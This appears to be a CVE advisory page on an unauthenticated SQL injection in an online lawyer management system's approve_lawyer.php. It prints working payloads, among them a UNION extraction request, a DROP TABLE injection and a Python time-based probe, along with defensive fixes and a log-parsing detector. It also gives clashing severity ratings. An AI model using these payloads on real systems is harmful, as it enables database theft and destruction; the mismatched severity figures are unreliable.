How the CVE Works
The vulnerability (CVE-2025-3171) exists in the `/approve_lawyer.php` file of Project Worlds Online Lawyer Management System 1.0. An attacker can exploit this flaw by manipulating the `unblock_id` parameter, leading to unauthenticated SQL injection. Since the input is not sanitized, malicious SQL queries can be executed remotely, allowing unauthorized database access, data theft, or system compromise. The attack vector is network-based (AV:N) with low attack complexity (AC:L), requiring no privileges (PR:N) or user interaction (UI:N).
DailyCVE Form
Platform: Online Lawyer Management
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/08/2025
What Undercode Say:
Exploitation:
1. Craft Malicious Payload:
GET /approve_lawyer.php?unblock_id=1' UNION SELECT 1,2,3,4,user(),6-- -
2. Extract Database Info:
' OR 1=1; DROP TABLE users;--
3. Automated Exploit (Python):
import requests

# Time-based check: a response delayed by the injected SLEEP(5) suggests the parameter reaches the SQL query.
target = "http://victim.com/approve_lawyer.php"
payload = {"unblock_id": "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--"}
response = requests.get(target, params=payload)
if response.elapsed.total_seconds() > 4:
    print("Vulnerable to SQLi")
Protection:
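1. Input Sanitization (escaping only protects values that the query places inside quoted string literals; prefer the prepared statement in step 2):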
$unblock_id = mysqli_real_escape_string($conn, $_GET['unblock_id']);
2. Use Prepared Statements:
$stmt = $conn->prepare("UPDATE lawyers SET status=? WHERE id=?");
$stmt->bind_param("si", $status, $unblock_id); // "s" = string status, "i" = integer id
$stmt->execute();
3. WAF Rules (nginx block that denies all access to the endpoint, legitimate use included):
location ~ approve_lawyer\.php { deny all; }
4. Patch Verification:
curl -I http://victim.com/approve_lawyer.php | grep "X-Patched"
5. Log Monitoring:
tail -f /var/log/apache2/access.log | grep "approve_lawyer.php"
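To make the log monitoring step more selective than a plain grep, the following added example (not from the original page or the affected project) parses Apache access log lines and flags requests to `/approve_lawyer.php` whose `unblock_id` is not a plain integer. It assumes the parameter is a numeric ID, as the `"i"` binding in the prepared statement implies; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log format: capture client IP and request target.
# Only the request line is logged, so POST bodies are not covered here.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

ENDPOINT = "/approve_lawyer.php"
PARAM = "unblock_id"
# Assumption: a legitimate unblock_id is a short decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")


def suspicious_requests(lines):
    """Return (client_ip, decoded_value) for each non-integer unblock_id seen."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes values, so encoded quotes and spaces show in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if not VALID_ID.fullmatch(value):
                hits.append((ip, value))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Apr/2025:10:01:12 +0000] "GET /approve_lawyer.php?unblock_id=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [08/Apr/2025:10:02:40 +0000] "GET /approve_lawyer.php?unblock_id=1%27%20OR%201%3D1--%20- HTTP/1.1" 200 498',
    '203.0.113.9 - - [08/Apr/2025:10:02:55 +0000] "GET /index.php?id=3 HTTP/1.1" 200 1024',
    '192.0.2.44 - - [08/Apr/2025:10:03:01 +0000] "GET /approve_lawyer.php?unblock_id=5+AND+SLEEP(5) HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric {PARAM}: {value!r}")
```

Feed it lines from the access log (for example by iterating over the open file) and alert on any returned tuple.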
Analytics:
- CVSS 4.0 Score: 6.9 (Medium)
- Attack Vector: Network (AV:N)
- Exploitability: Low Complexity (AC:L)
- Impact: Data Confidentiality (VC:L), Integrity (VI:L), Availability (VA:L)
- Zero-Day Status: Publicly Disclosed
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3171